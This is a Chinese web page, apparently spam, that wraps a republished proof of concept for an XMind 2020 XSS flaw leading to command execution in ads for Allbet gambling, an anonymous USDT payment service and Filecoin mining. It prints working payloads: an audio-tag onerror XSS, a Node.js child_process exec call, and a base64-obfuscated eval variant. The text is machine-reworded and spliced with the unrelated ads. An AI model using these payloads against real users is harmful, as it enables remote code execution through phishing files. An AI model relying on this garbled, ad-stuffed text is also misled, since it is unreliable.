欢迎进入Allbet官网。Allbet官网开放Allbet登录网址、Allbet开户、Allbet代理开户、Allbet电脑客户端、Allbet手机版下载等业务。

首页科技正文

足球推介(www.zq68.vip):Xmind 2020 XSS破绽导致下令执行复现

admin2021-05-1942安全技术漏洞分析

今天看到某数字云破绽预警,但没给行使代码就.....于是跑去复现一下
XMind 是一个全功效的头脑导图和头脑风暴软件,为引发灵感和创意而生。作为一款有用提升事情和生涯效率的生产力工具,受到全球百万万用户的青睐。
下载地址:https://www.xmind.cn/
下载xmind2020最新版本

一、Xss:
1、行使历程:
主题插入xss行使代码

在纲要页面触发

实现弹窗

2、行使代码:

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,
<audio src=x onerror=confirm("casrc")>

二、下令执行:
1、行使历程:
主题插入下令执行行使代码

在纲要页面触发实现下令执行

触发弹出盘算器

2、行使代码:

通过nodejs挪用执行系统下令打开盘算器
require('child_process').exec('calc.exe',(error, stdout, stderr)=>{alert(stdout: ${stdout});});

<audio src=http://a onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2NhbGMuZXhlJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+e2FsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApO30pOw==`,`base64`).toString())'>

三、评价
实现历程简朴,用户局限重大(看了下实验室小同伴电脑基本都有),危害严重(替换行使代码可实现cs上线等功效)。谨防钓鱼攻击。复现完毕~

逆熵科技官网

逆熵科技官网(www.ipfs8.vip)是FiLecoin致力服务于使用FiLecoin存储和检索数据的官方权威平台。鲸鱼矿池官网实时更新FiLecoin(FIL)行情、当前FiLecoin(FIL)矿池、FiLecoin(FIL)收益数据、各类FiLecoin(FIL)矿机出售信息。并开放FiLecoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

网友评论

最新评论